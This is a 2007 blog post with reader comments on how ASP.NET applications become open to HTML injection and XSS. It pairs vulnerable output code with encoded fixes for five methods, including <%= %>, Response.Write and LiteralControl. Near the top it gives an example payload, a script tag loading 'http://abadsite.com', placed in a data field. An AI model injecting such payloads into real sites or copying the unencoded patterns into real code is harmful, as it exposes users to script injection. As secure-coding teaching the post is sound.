5 signs your ASP.NET application may be vulnerable to HTML injection

If you don’t encode data when using any of the following methods to output to HTML your application could be compromised by unexpected HTML turning up in the page and modifying everything from formatting though to capturing and interfering with form data via remote scripts (XSS). Such vulnerabilities are incredibly dangerous.

Using MonoRail or Microsoft’s MVC does not make you automatically immune – use {! } in MonoRail’s Brail engine and the HtmlHelpers in Microsoft’s MVC to ensure correct encoding.

Just imagine post.Author contains “><script src=”http://abadsite.com”></script> after an unscrupulous user entered that into a field your application uses and it got into the database. The following typical ASP.NET techniques would leave you open.

1. You use <%= %> or <%# %> tags to output data

Example showing outputting literals with <%= %> :

// Vulnerable
<p>Posted by <%= post.Author %></p>
// Secure
<p>Posted by <%= HttpUtility.HtmlEncode(post.Author) %></p>

2. You use Response.Write

Example showing writing out attributes with Response.Write and String.Format, again post.Author could contain <script>:

// Vulnerable
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", post.Author);
// Secure
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", HttpUtility.HtmlAttributeEncode(post.Author));

3. You set HRef or Src on HtmlAnchor, HtmlImage or HtmlnputImage controls

In general the HtmlControls namespace are very well behaved with encoding but there is a bug in the code that attempts to adjust the relative url’s for href and src attributes which causes those properties to bypass encoding (I’ve reported this to Microsoft).

Example showing anchor HRef attribute abuse:

// Vulnerable
outputDiv.Controls.Add(new HtmlAnchor() { Text = "Test", HRef = post.Author } );
// Secure
outputDiv.Controls.Add(new HtmlAnchor() { Text = "Test", HRef = HttpUtility.HtmlAttributeEncode(post.Author) } );

4. You set the Text property of WebControls/WebForms

You would imagine the high-level WebForms controls would take care of encoding and you’d be wrong.

Example showing the Label control being so easily taken advantage of:

// Vulnerable
outputDiv.Controls.Add(new Label() { Text = post.Author } );
// Secure
outputDiv.Controls.Add(new Label() { Text = HttpUtility.HtmlEncode(post.Author) } );

The one exception to this is the Text property of input controls – as they put the value into an attribute and therefore call HttpUtility.HtmlAttributeEncode for you.

5. You use the LiteralControl

LiteralControl is a useful control for adding text to the output stream that doesn’t require it’s own tag. It also helpfully, and uncharacteristically, provides a useful constructor. Unfortunately it fails encode the output.

Example showing poor LiteralControl wide open:

// Vulnerable
outputDiv.Controls.Add(new LiteralControl(post.Author));
// Secure
outputDiv.Controls.Add(new LiteralControl(HttpUtility.HtmlEncode(post.Author)));
Do not:
  1. Encode data in the database – your contaminated data will be difficult to use elsewhere and will end up double-encoded
  2. Look for script on submit – you won’t catch every combination and it might prevent valid data
  3. Trap entry with client-side code – it is trivially bypassed

Just encode the output :)

[)amien
(The samples use .NET 3.5 object initializer syntax for brevity as many affected controls do not have useful constructors)

15 responses  

  1. I would love to see some type of shortcut in MVC like brail has in monorail. In brail I can !{post.Author} and it will be html encoded. It would be nice if MS MVC and ASP.Net for that matter added something like so encoding did not have to take a function call. Not having this will be so much more annoying in MS MVC has you will have many more code blocks.

    Adam TyborDecember 18th, 2007
  2. {! } is good in MonoRail, I think Ayende added it in response to my ticket on encoding being off by default and causing a problem through to components such as the SmartGrid.

    Having something similar in MVC would be great although personally I’d love it to be mapped to a method on a new HtmlViewPage class which inherits from ViewPage so that you can switch out the encoding method for different output types.

    There is some discussion about the whole issue so we’ll see what happens.

    [)amien

    Damien GuardDecember 18th, 2007
  3. I wonder why escaping (or encoding if you prefer) the HTML isn’t the default on the higher-level constructs. I can understand why the low-level ASP output methods don’t do it, but IMO higher level frameworks should always default to safe behaviour. Having to remember to explicitly escape is a huge pain the ass.

    I know everyone except me reading your blog hates Java, but again JSF demonstrates good practice here, by defaulting to escaping HTML. Since JSF is a common building block for most serious Java web software, the result is that most people building using it will have at least that minimum requirement covered without having to keep reminding themselves. I think the MVC framework, or some intermediate view component for ASP (as JSF is to JSP) should do the same.

    steveDecember 18th, 2007
  4. And interestingly, I think shortcuts like {! have a downside. Sure it’s quicker to type, but it does nothing to remind you that you should be using it. And, it’s arguably harder to spot a missing ! when you’re reviewing code than it is to miss a missing explicit encoding/escaping method call. I don’t think shortcuts are the answer at all, making safety the default is much more robust.

    steveDecember 18th, 2007
  5. Yeah I agree with you here and have to conceed that JSF/JSP did the right thing.

    Microsoft almost got it right with the HtmlControls but for that bug I found.

    [)amien

    Damien GuardDecember 18th, 2007
  6. Great article, I have always encoded entries into the db but never encoded the output from the DB. After reading this I was like “duh!! why didn’t I think if that”. I wonder if someone could make an Ajax extender for a textbox that automatically encodes the output. Thanks again, Scott

    ScottB – December 18th, 2007
  7. So…

    By saying ASP.NET does nothing for you, are you implying that putting a “” section into your web.config isn’t working anymore for some reason?
    It certainly isn’t fool-proof, but it gives a huge head-start getting around the issues you are describing.

    Dave – December 18th, 2007
  8. Lol, I think that WordPress is determining that might be dangerous. Dave was, I think, mentioning the <page validateRequest=”true” /> option in web.config that tries to prevent your application accepting script from the user.

    This is all well and good but if there are other ways to get data into your database (links with other company systems, web services, message pumps or even internal WinForms apps) then those too can be avenues for attack.

    Many attacks happen from the inside and anyone with access to the SQL box or a WinForms app could be the one putting the payload there ready for your application to deliver up to unsuspecting users.

    [)amien

    Damien GuardDecember 18th, 2007
  9. pingback

    [...] 5 signs your ASP.NET application may be vulnerable to HTML injection – which means that you may be vulnerable to XSS attacks too. [...]

    Our daily link (2007-12-18) - Trumpi's blogDecember 18th, 2007
  10. But that’s not really 5 signs — It’s really just one sign — because , Response.Write, HtmlAnchor et al aren’t the problem. The problem is post.Author. If it comes from a trusted source (i.e., you typed it in yourself), it’s save to output directly. If it comes from anywhere else (notably user input), then it must be encoded.

    James CurranDecember 19th, 2007
  11. It should be encoded regardless of where it came from or whether it is believed to be safe. The only exception is data you expect to contain HTML and are going to sanitize to ensure only has the HTML you like.

    One example I’ve seen is blogging software that fails to encode blog post titles because they are ‘safe’ in that they are only entered by the blogging author.

    You create a blog post called “Using List<T> for collections” and it shows up with “Using List for collections”, causes the page to fail validation and breaks the RSS feed.

    [)amien

    Damien GuardDecember 19th, 2007
  12. pingback

    [...] For more ASP.NET examples check out 5 signs your ASP.NET application may be vulnerable to HTML injection. [...]

    How dangerous is HTML injection? » DamienGDecember 19th, 2007
  13. great article, i like the ideas in it
    a kick from me ;)

    Fady AnwarDecember 19th, 2007
  14. Damien,
    When you say “You would imagine the high-level WebForms controls would take care of encoding and you’d be wrong.”. Is there a list of controls that are vulnerable and a list of controls that are not?

    Amit – February 11th, 2009
  15. pingback

    [...] right about something. Don’t HTML encode data that’s stored in your database! Take the good advice of Damien Guard and Joel Spolsky! You can choose to store both representations, but don’t store just the [...]

    Podcast #58 - Blog - Stack OverflowJune 17th, 2009

Respond to this